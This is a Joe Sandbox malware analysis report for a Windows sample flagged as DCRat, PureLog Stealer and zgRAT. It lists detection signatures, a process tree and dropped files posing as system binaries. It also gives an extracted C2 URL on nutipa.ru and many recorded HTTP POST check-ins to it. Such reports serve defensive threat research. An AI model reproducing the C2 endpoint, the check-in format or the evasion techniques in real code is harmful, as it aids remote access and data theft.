Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
150bIjWiGH.exe

Overview

General Information

Sample name:150bIjWiGH.exe
renamed because original name is a hash value
Original sample name:E7870CD0C30A52066C454C15A5A5A2F5.exe
Analysis ID:1575493
MD5:e7870cd0c30a52066c454c15a5a5a2f5
SHA1:fc64203e05c104a116e7e4c354c9ee77c99737d6
SHA256:e4a958444e72eb1b3be02f3a8bf29044a81f328405a4969a4f66515ef219774e
Tags:DCRatexeuser-abuse_ch
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 150bIjWiGH.exe (PID: 7648 cmdline: "C:\Users\user\Desktop\150bIjWiGH.exe" MD5: E7870CD0C30A52066C454C15A5A5A2F5)
    • cmd.exe (PID: 7784 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\abd16af8Ll.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7832 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7848 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • 150bIjWiGH.exe (PID: 7956 cmdline: "C:\Users\user\Desktop\150bIjWiGH.exe" MD5: E7870CD0C30A52066C454C15A5A5A2F5)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://nutipa.ru/_authGamewordpress", "MUTEX": "DCR_MUTEX-1PskwlBIP03G3dSi5snm"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
150bIjWiGH.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    150bIjWiGH.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Recovery\winlogon.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Recovery\winlogon.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000005.00000002.2924790458.00000000034D3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000005.00000002.2924790458.0000000003215000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                    00000000.00000000.1674964023.0000000000FC2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: 150bIjWiGH.exe PID: 7648JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 1 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.150bIjWiGH.exe.fc0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.150bIjWiGH.exe.fc0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\150bIjWiGH.exe, ProcessId: 7648, TargetFilename: C:\Recovery\winlogon.exe

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-15T19:36:25.013442+010020480951A Network Trojan was detected192.168.2.449738104.21.64.13080TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: 150bIjWiGH.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://nutipa.ruAvira URL Cloud: Label: malware
                              Source: http://nutipa.ru/Avira URL Cloud: Label: malware
                              Source: http://nutipa.ru/_authGamewordpress.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\user\AppData\Local\Temp\abd16af8Ll.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Program Files\Google\Chrome\Application\Idle.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\HwrGmkBt.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\BDOgJEwE.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Users\user\Desktop\ItSOHkQo.logAvira: detection malicious, Label: TR/Agent.jbwuj
                              Source: C:\Users\user\Desktop\NjdutxKy.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                              Source: C:\Recovery\winlogon.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\JtmEmBJF.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\NsNNYhlE.logAvira: detection malicious, Label: TR/AVI.Agent.updqb
                              Source: C:\Recovery\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Found malware configuration
                              Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://nutipa.ru/_authGamewordpress", "MUTEX": "DCR_MUTEX-1PskwlBIP03G3dSi5snm"}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files\Google\Chrome\Application\Idle.exeReversingLabs: Detection: 71%
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeReversingLabs: Detection: 71%
                              Source: C:\Recovery\KcduafKotlNaKVM.exeReversingLabs: Detection: 71%
                              Source: C:\Recovery\conhost.exeReversingLabs: Detection: 71%
                              Source: C:\Recovery\winlogon.exeReversingLabs: Detection: 71%
                              Source: C:\Users\user\Desktop\BDOgJEwE.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\CBqofELz.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\FInxAXGv.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\ItSOHkQo.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\JBWWRkkK.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\NsNNYhlE.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\OmvnkQVc.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\XXHldJFg.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\ctybNUhB.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\fBwkimbw.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\gJztsmvT.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\imbBpzmp.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\jafJbNin.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\lcSrxwmi.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\mutAqiZC.logReversingLabs: Detection: 50%
                              Source: C:\Users\user\Desktop\pekirssD.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\rhLyTfpq.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\taahEcao.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\trhzTxUr.logReversingLabs: Detection: 37%
                              Source: C:\Users\user\Desktop\wINPCZGL.logReversingLabs: Detection: 20%
                              Source: C:\Users\user\Desktop\yVbyLHQi.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\zTDGhHfd.logReversingLabs: Detection: 25%
                              Multi AV Scanner detection for submitted file
                              Source: 150bIjWiGH.exeReversingLabs: Detection: 71%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\CBqofELz.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Google\Chrome\Application\Idle.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\JBWWRkkK.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\HwrGmkBt.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\XXHldJFg.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\NjdutxKy.logJoe Sandbox ML: detected
                              Source: C:\Recovery\winlogon.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\EOEXonVW.logJoe Sandbox ML: detected
                              Source: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\NpUfPQGh.logJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\JtmEmBJF.logJoe Sandbox ML: detected
                              Source: C:\Recovery\conhost.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: 150bIjWiGH.exeJoe Sandbox ML: detected
                              Sample uses string decryption to hide its real strings
                              Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: ["bj0UKX3O1fsx9BYPGXoKHqjvLayVva1jN63FIaBpzhY4ZE1D43om8NOuAFJtihcbnIkDHSHpW8UjRpWHjvb2vPk9sIFCRRHSF7QQdy5lw8PA2odUtBKwGkpYhlU9MEYF","DCR_MUTEX-1PskwlBIP03G3dSi5snm","0","","","5","2","WyIxIiwiIiwiNSJd","WyIiLCJXeUlpTENJaUxDSmlibFp6WWtFOVBTSmQiXQ=="]
                              Source: 00000000.00000002.1731048102.0000000013AC4000.00000004.00000800.00020000.00000000.sdmpString decryptor: [["http://nutipa.ru/","_authGamewordpress"]]
                              Source: 150bIjWiGH.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Google\Chrome\Application\Idle.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Google\Chrome\Application\6ccacd8608530fJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Uninstall Information\KcduafKotlNaKVM.exeJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeDirectory created: C:\Program Files\Uninstall Information\c73aadd6ea7e5bJump to behavior
                              Source: 150bIjWiGH.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\150bIjWiGH.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.4:49738 -> 104.21.64.130:80
                              Source: Joe Sandbox ViewIP Address: 104.21.64.130 104.21.64.130
                              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1420Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 1392Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /_authGamewordpress.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: nutipa.ruContent-Length: 2536Expect: 100-continue
